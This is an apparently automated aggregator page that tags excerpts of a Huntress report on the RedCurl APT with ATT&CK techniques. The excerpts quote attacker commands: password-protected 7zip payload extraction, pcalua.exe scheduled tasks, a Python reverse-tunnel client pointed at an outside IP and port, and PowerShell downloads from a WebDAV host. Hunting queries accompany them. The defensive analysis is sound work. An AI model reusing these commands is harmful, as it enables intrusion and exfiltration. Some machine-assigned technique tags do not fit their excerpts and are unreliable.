TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Hunt for RedCurl | Huntress

2025-03-03 · Read original ↗

ATT&CK techniques detected

20 predictions
T1053.005Scheduled Task
99%
“exe to launch the malware via scheduled tasks. this binary executed a batch script, which then launched powershell to unarchive files with 7zip and add them to the system. " c : \ programdata \ 7za. exe " x - aoa - p < redacted > revtun3ag. tmp - oc : \ programdata \ controlsup a…”
T1053.005Scheduled Task
99%
“controlsup \ cl \ cl. py - - s 188. 130. 207 [. ] 253 - - p 10310 additional tasks scheduled task 2 wifitask da76918700ee0725 executable : pcalua. exe arguments : - a c : \ windows \ system32 \ config \ systemprofile \ appdata \ local \ wcm \ mbda76918700ee0725. exe scheduled tas…”
T1053.005Scheduled Task
99%
“) by running the command : get - scheduledtask - taskname " [ task name ] " - verbose | select - expandproperty actions the sigma rule scheduled task executed uncommon lolbin contains the right logic for this, but would just need the addition of \ pcalua. exe to the list of paths…”
T1053.005Scheduled Task
99%
“- a ” ) then, you can utilize a sigma rule for basic pcalua. exe execution and add any filters for normal activity you observe. if you have the microsoft - windows - taskscheduler / operational event log enabled, you can search for tasks that are created that execute pcalua. exe,…”
T1053.005Scheduled Task
99%
“practices for event logging and threat detection " was published, which again highlighted the heavy use of lotl techniques and gave guidance on setting up proper logging to detect these attacks. the most common technique we saw used in these incidents was the use of pcalua. exe i…”
T1059.001PowerShell
97%
“##za. exe " ) ) and process. parent. name = = “ powershell. exe ” note : the queries above should be made case insensitive, if possible in your environment, for the best results. conclusion the activity observed in this attack highlights the importance of constantly monitoring yo…”
T1059.006Python
96%
“looking for python executables in those events while filtering out some normal activity. alternatively, you can hunt for the same activity by running queries through process data looking for python. exe or pythonw. exe with commands that include an ip address, perhaps using a sim…”
T1053.005Scheduled Task
93%
“##869b4c executable : pcalua. exe arguments : - a c : \ users \ < redacted > \ appdata \ local \ subscriptionmonitor \ uo94e668b9cf869b4c. exe scheduled task 5 silentcleanup 6db9110b3989a881 executable : pcalua. exe arguments : - a c : \ programdata \ diskcleanup \ om6db9110b3989…”
T1486Data Encrypted for Impact
93%
“and guidance for detecting and mitigating these attacks. this was followed up with the creation and release of another joint effort document called " identifying and mitigating living off the land techniques " which can be found on the australian signals directorate website, whic…”
T1560.001Archive via Utility
92%
“in process data ) from these incidents : start " " " % pdir % \ pythonw. exe " % pdir % \ rpv \ client. py - - server - ip % srv % - - server - port % port % this query would likely have a number of legitimate matches in many development environments where python is used frequent…”
T1105Ingress Tool Transfer
91%
“download files called revtun1. tmp and revtun2. tmp from bora. teracloud [. ] jp / dav using http get requests crafted within the powershell commands. the files downloaded are then extracted with 7zip, using a password stored in the batch file. this specific behavior was used by …”
T1053.005Scheduled Task
86%
“. exe arguments : - a c : \ programdata \ diskcleanup \ om6db9110b3989a881. exe we also saw additional scheduled tasks, which are likely related activity that used pcalua. exe to call pythonw. exe and execute a script to start reverse proxy tunnels. this seems to have been on som…”
T1560.001Archive via Utility
84%
“to start looking for more specific behavior of query for creating password - protected archive files with 7zip and deleting the original files with the - sdel flag : where ( ( winlog. event _ data. description like " * 7 - zip * " or ( process. name = = " 7z. exe " or process. na…”
T1486Data Encrypted for Impact
73%
“motivated threat actor who may be interested in the data that can be found in your network. iocs files network indicators mitre att & ck mapping references - trend micro report : “ unveiling earth kapre ( aka redcurl ' s cyberespionage tactics ) " - group - ib redcurl reports : 2…”
T1059.001PowerShell
69%
“download files called revtun1. tmp and revtun2. tmp from bora. teracloud [. ] jp / dav using http get requests crafted within the powershell commands. the files downloaded are then extracted with 7zip, using a password stored in the batch file. this specific behavior was used by …”
T1053.005Scheduled Task
56%
“learned from these incidents and how to detect similar techniques that redcurl or any other malware or adversaries could use in the future. what did we find? the huntress security operations center ( soc ) received an alert on a host that had recently installed the huntress agent…”
T1059.001PowerShell
56%
“we identified the same tradecraft used on additional hosts and at various other organizations. we uncovered three intrusions across three different organizations that were all fully or partially located in canada. the activity observed in these attacks all match very closely with…”
T1053Scheduled Task/Job
42%
“practices for event logging and threat detection " was published, which again highlighted the heavy use of lotl techniques and gave guidance on setting up proper logging to detect these attacks. the most common technique we saw used in these incidents was the use of pcalua. exe i…”
T1005Data from Local System
38%
“hunt for redcurl | huntress in mid to late 2024, huntress uncovered activity across several organizations in canada, with similar infrastructure and ttps used that can be associated with the apt group known as redcurl ( aka earth kapre and red wolf ). this activity goes back as f…”
T1560.001Archive via Utility
30%
“from a particular software or process, and would be easy to filter out this known activity. hunting for this particular process chain would catch a good amount of the observed redcurl activity and some other possibly interesting events. the dfirreport noted in their report from a…”

Summary

Huntress discovered RedCurl activity across several organizations in Canada going back to 2023. Learn more about how this APT operates and how they aim to remain undetected while exfiltrating sensitive data.